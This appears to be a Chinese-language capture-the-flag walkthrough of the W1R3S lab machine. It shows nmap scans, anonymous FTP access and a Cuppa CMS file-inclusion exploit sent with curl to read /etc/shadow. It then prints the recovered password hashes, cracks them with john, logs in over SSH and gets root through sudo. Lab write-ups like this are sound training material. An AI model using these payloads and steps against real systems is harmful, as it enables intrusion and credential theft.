探测
nmap -p- --min-rate 1000 -sT -sV -O 192.168.206.130
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:6F:43:28 (VMware)
Aggressive OS guesses: Linux 3.10 - 4.11 (98%), Linux 5.1 - 5.15 (95%), Linux 3.2 - 4.14 (94%), Linux 3.13 - 4.4 (94%), Linux 4.10 (94%), Linux 4.4 (93%), Linux 3.10 (92%), Linux 3.16 - 4.6 (92%), OpenWrt 19.07 (Linux 4.14) (92%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap -p- --min-rate 1000 -sU 192.168.206.130
PORT STATE SERVICE
3306/udp closed mysql
nmap -p- --min-rate 1000 --script=vuln 192.168.206.130
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|http-dombased-xss: Couldn’t find any DOM based XSS.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server’s resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http://ha.ckers.org/slowloris/
|http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
| http-enum:
| /wordpress/wp-login.php: Wordpress login page.
3306/tcp open mysql
ftp
匿名用户
anonymous/null
mget下载01.txt;02.txt;03.txt;worktodo.txt;employee-names.txt到本地,均无敏感信息
web
目录扫描出cms路径,安装利用失败
/administrator/installation
cms有文件包含exp
searchsploit cuppa
下载exp
searchsploit cupa -m 25971.txt
该cms默认payload
http://target/cuppa/alerts/alertConfigField.php?urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow
需要参数用post+urlencode,得出最终payload
curl http://192.168.206.130/administrator/alerts/alertConfigField.php --data-urlencode “urlConfig=…/…/…/…/…/…/…/…/…/etc/shadow”
回显中三个密码为
root:666vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ
data:$68JMxE7l08JMxE7l08JMxE7l0yQ16jM…ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0…Zk.TUKDoDAVRCoXiZAH.Ud
w1r3s:666xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1i
解密
john 1.txt 解出w1r3s密码
getshell
ssh w1r3s/computer
提权
sudo -l为all
直接提权
sudo /bin/bash
扫一扫
1784
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
